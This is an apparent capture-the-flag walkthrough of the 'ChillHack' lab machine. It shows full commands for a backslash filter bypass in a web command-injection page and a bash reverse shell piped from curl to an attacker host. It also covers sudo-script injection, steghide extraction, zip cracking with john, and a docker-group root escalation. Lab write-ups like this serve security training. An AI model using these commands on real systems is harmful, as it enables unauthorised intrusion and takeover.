ChillHack

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.161.202

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 21,22,80

• (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202

Enumeration

Port 21: FTP

We see in the nmap scan that Anonymous FTP login is allowed, so lets login

ftp 10.10.161.202

Listing the files we see that there is a note.txt file so lets transfer this file to our machine.

get note.txt

Lets read note.txt

We have two usernames, Anurodh and Apaar , lets add this to our notes.

We also see that there is some filtering on strings being put in the command, which we might encounter while enumerating this machine further.

Port 80: HTTP

Lets visit the site.

Looks like a very well made website, lets run gobuster to find hidden directories while we explore the webpage.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202 

I looked through the website and found nothing interesting in the source code too, after a while I got the results for the gobuster scan

Lets visit this /secret directory.

Looks like we can execute commands, lets try executing a basic command. When I tried executing ls it gave me this.

Now looking back at the note.txt, it mentioned that there was filtering on the commands, so to bypass that I remembered there was a way we could bypass filtering, we can do this by using backslashes in the command. We are no escaping any special characters so then the word will be interpreted the same way by bash. Lets try l\s.

And it worked so now lets check the index.php page which will tell us what characters and words are being filtered.

c\at index.php

After executing the look at the source code.

We have a list of words that have been blacklisted which means that we cannot use them on the system, also we can see the function that allows command injection. Lets now try to get a reverse shell on the machine.

Exploitation

• First we create a bash reverse shell

• Second we transfer it to the victim machine by starting a http server on our machine and using the curl command

• Finally once the file is downloaded we can start a netcat listener and execute the file we transferred to get a reverse shell on the machine.

First we create a bash reverse shell called shell.sh

bash -c "bash -i >& /dev/tcp/<your-ip>/1234 0>&1"

Now we start a http server

python3 -m http.server 8000

Lets also start a netcat listener.

nc -lvnp 1234

Now we download the file on the victim machine using curl and then execute is using bash in the same command. We are using a backslash in bash as it has been blacklisted.

curl <your-ip>:8000/shell.sh | ba\sh

After executing the command, we get a reverse shell.

Lets now stabilize the shell.

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C

Privilege Escalation

Looking at the files in the system, we did not have permissions to read most of them, so lets run a automatic enumeration script called linpeas, you can find this google, once you download it we have to transfer to this machine.

We already have a http server running, if you switched it off, start is up again.

Now we have to go the /tmp directory as we are not allowed to download files in other directories and usually /tmp always gives us permissions to download files into its directory.

wget http://<your-ip>:8000/linpeas.sh

Before this lets run sudo -l to see what we can run as other users.

Looks like we can run a script file, lets read it.

Looking at the script, it looks like it is vulnerable to command injection as there are no filters. And this file is owned by Apaar, we can try running it and execute a bash shell and get a bash instance as the user Apaar.

Lets first run the file and then type /bin/bash to get a shell as Apaar and then stabilize the shell.

sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

We are now the user Apaar. We can read the User flag now in Apaar's home directory.

Now I tried running linpeas but It did not work so I had to find another way to privilege escalate and that is when I found an interesting files in /var/www/files.

Lets read these files

hacker.php

This looks like it is displaying a image file and there is a message which is telling that there might be something in the image file . Lets download this file, before that lets explore the other files.

account.php

This looks like a login page.

index.php

In this file we see the credentials for the SQL database running on this machine.

Lets now download the image file we found in hacker.php, first lets go to the directory in which the file is present.

Lets start a http server on this machine.

python3 -m http.server 8000

Now lets download the file onto our machine

wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg

Now lets look at the file

Lets use steghide to look for hidden information in the file. (Click enter for the password)

steghide info hacker-with-laptop_23-2147985341.jpg

We see a zip file, lets extract it using steghide.

steghide --extract -sf hacker-with-laptop_23-2147985341.jpg

Lets unzip this zip file that we got.

unzip backup.zip

Looks like we need a password, we can use zip2john and then john the ripper to find the password.

zip2john backup.zip > hash

Now use john to crack the password

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Now show the password

john hash --show

We have the password. Lets unzip the zip the file

unzip backup.zip

Lets read the source_code.php file

Looking through we find the base64 text that is the password for the user Anurodh. Lets decode the string.

echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

We the password, lets now login through ssh.

ssh anurodh@10.10.161.202

We are now logged in. I was looking through and did not see anything of interest until I ran the command id.

id

Anurodh is part of the docker group. We can find the command to become root on GTFOBins.

Lets run this command

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

We are now root.